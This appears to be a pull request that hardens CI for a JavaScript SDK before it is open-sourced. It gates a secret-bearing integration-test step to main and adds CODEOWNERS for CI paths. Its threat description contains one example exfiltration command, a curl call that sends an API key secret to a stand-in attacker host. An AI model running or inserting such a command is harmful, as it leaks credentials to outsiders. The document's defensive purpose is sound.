### PR TITLE
Protect CI secrets from untrusted PRs ahead of open-sourcing

### DIFF
--- a/.buildkite/pipeline.yml
+++ b/.buildkite/pipeline.yml
@@ -52,8 +52,13 @@ steps:
           - pnpm install --frozen-lockfile
           - pnpm test:unit
 
+      # Gated to main-branch builds so the REACTOR_API_KEY secret is never
+      # exposed to PR builds (including PRs from forks). PRs still run build,
+      # lint, format, license, secret scan, and unit tests above — all of
+      # which are secret-free and safe to run on untrusted code.
       - label: ":globe_with_meridians: Integration Tests"
         key: integration-tests
+        if: build.branch == "main"
         commands:
           - corepack enable
           - pnpm install --frozen-lockfile

--- a/.github/CODEOWNERS
+++ b/.github/CODEOWNERS
@@ -1,0 +1,23 @@
+# CODEOWNERS for reactor-team/js-sdk.
+#
+# This file exists primarily to protect CI infrastructure once the
+# repository is open-sourced. Changes to anything that runs in CI with
+# access to secrets — or that defines what runs in CI at all — must be
+# reviewed by a maintainer, even when GitHub's branch protection would
+# otherwise accept the PR.
+#
+# https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/customizing-your-repository/about-code-owners
+
+# Buildkite pipeline definition — controls which steps run, which secrets
+# they receive, and which agent queue picks them up.
+/.buildkite/                  @Dere-Wah @bryceoz @tempusfrangit @mmassenzio
+
+# GitHub Actions workflows — including npm publish on release and the
+# docs-PR automation that holds DOCS_REPO_PAT / ANTHROPIC_API_KEY.
+/.github/workflows/           @Dere-Wah @bryceoz @tempusfrangit @mmassenzio
+
+# Shell scripts invoked from CI (e.g. check-license.sh).
+/scripts/                     @Dere-Wah @bryceoz @tempusfrangit @mmassenzio
+
+# CODEOWNERS itself — prevent a PR from quietly weakening the rules above.
+/.github/CODEOWNERS           @Dere-Wah @bryceoz @tempusfrangit @mmassenzio

--- a/.github/CODEOWNERS
+++ b/.github/CODEOWNERS
@@ -10,14 +10,14 @@
 
 # Buildkite pipeline definition — controls which steps run, which secrets
 # they receive, and which agent queue picks them up.
-/.buildkite/                  @Dere-Wah @bryceoz @tempusfrangit @mmassenzio
+/.buildkite/                  @Dere-Wah @bryceoz @tempusfrangit @mmassenzio @amontalban
 
 # GitHub Actions workflows — including npm publish on release and the
 # docs-PR automation that holds DOCS_REPO_PAT / ANTHROPIC_API_KEY.
-/.github/workflows/           @Dere-Wah @bryceoz @tempusfrangit @mmassenzio
+/.github/workflows/           @Dere-Wah @bryceoz @tempusfrangit @mmassenzio @amontalban
 
 # Shell scripts invoked from CI (e.g. check-license.sh).
-/scripts/                     @Dere-Wah @bryceoz @tempusfrangit @mmassenzio
+/scripts/                     @Dere-Wah @bryceoz @tempusfrangit @mmassenzio @amontalban
 
 # CODEOWNERS itself — prevent a PR from quietly weakening the rules above.
-/.github/CODEOWNERS           @Dere-Wah @bryceoz @tempusfrangit @mmassenzio
+/.github/CODEOWNERS           @Dere-Wah @bryceoz @tempusfrangit @mmassenzio @amontalban


### PR DESCRIPTION
## Why

We are about to open-source `reactor-team/js-sdk` and let outside contributors open PRs against it. Today the Buildkite pipeline at `.buildkite/pipeline.yml` runs on every push — including pushes to PR branches and pushes to forks — and one of the steps, **Integration Tests**, has `REACTOR_API_KEY` bound into the container's environment via Buildkite's `secrets:` block:

```yaml
- label: ":globe_with_meridians: Integration Tests"
  ...
  plugins:
    - docker#v5.12.0:
        ...
        environment:
          - "REACTOR_API_KEY"
  secrets:
    - REACTOR_API_KEY
```

There is no isolation between the test runner and the secret. An attacker who opens a malicious PR can either edit `pnpm test:integration` (or any script it transitively runs) to do `curl evil.example.com -d "\$REACTOR_API_KEY"`, or add a new pipeline step in their PR's copy of `.buildkite/pipeline.yml` that just `echo`s the key. Either way the secret leaves the build container.

This is the canonical OSS CI problem and the canonical fix has two layers: (1) **never put secrets into a build that runs untrusted code**, and (2) **don't let an untrusted PR change which jobs run or which secrets they receive**. This PR puts both layers in place for the immediate exposure (`REACTOR_API_KEY`) without changing developer ergonomics on internal PRs.

## What this changes

**Gate the secret-bearing step on `main`.** The Integration Tests step in `.buildkite/pipeline.yml` now carries `if: build.branch == "main"`. On every PR build (internal or from a fork) the step is skipped entirely and the secret is never bound. The remaining steps — Build, Format Check, License Check, Secret Scan, Unit Tests — are all secret-free and continue to provide full pre-merge feedback to contributors. Integration tests run once on the merge commit on `main`, which is the only build whose source we trust. A short comment above the step records the rationale so the next person to touch the pipeline doesn't accidentally drop the `if:` clause.

**Add `.github/CODEOWNERS`.** Three paths in the repo define or run code that executes in CI: `/.buildkite/` (which steps run, which queue picks them up, which secrets are bound), `/.github/workflows/` (the npm publish workflow and the `claude-docs-pr` workflow, which holds `DOCS_REPO_PAT` and `ANTHROPIC_API_KEY`), and `/scripts/` (shell scripts invoked from CI steps, e.g. `check-license.sh`). Each is now owned by the same maintainer set that owns the `reactor-team/reactor` monorepo. `CODEOWNERS` itself is also listed so the rules can't be quietly weakened in a contributor PR.

This is a defence-in-depth pairing: even if a maintainer later reintroduces a secret on a PR-triggered step, CODEOWNERS forces the change through a human review by someone who knows what they're looking at.

## What this does NOT do

This PR closes the immediate hole. There are two further hardenings worth considering as follow-ups, neither blocking:

- **Signed pipelines.** Buildkite supports cryptographically signing the pipeline YAML against a key held by the agent (`buildkite-agent` verifies on dispatch), so changes to `.buildkite/pipeline.yml` in a PR cause the build to refuse to start. That belongs in agent infra, not in the repo.
- **Separate `trusted` agent queue for `main`.** Today every step runs on the same agent pool. Moving the main-branch Integration Tests step onto a dedicated queue whose agents are the only ones with access to the secret would mean a hypothetical compromise of a PR build couldn't reach the secret even if Layer 1 regressed.

## Verification

- `.buildkite/pipeline.yml` parses; the `if:` field on a step is supported syntax per [Buildkite conditionals](https://buildkite.com/docs/pipelines/conditionals).
- Manually inspected the diff: only the Integration Tests step is gated; PR-relevant steps (build, lint, format, license, secret scan, unit tests) are unchanged.
- `CODEOWNERS` follows the same maintainer list as `reactor-team/reactor/.github/CODEOWNERS`.